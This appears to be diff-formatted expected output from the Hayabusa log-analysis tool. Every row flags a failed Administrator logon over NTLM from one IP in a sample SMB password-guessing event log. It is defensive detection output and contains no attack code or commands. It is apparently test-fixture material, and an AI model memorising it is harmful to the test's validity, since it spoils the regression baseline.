+2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 
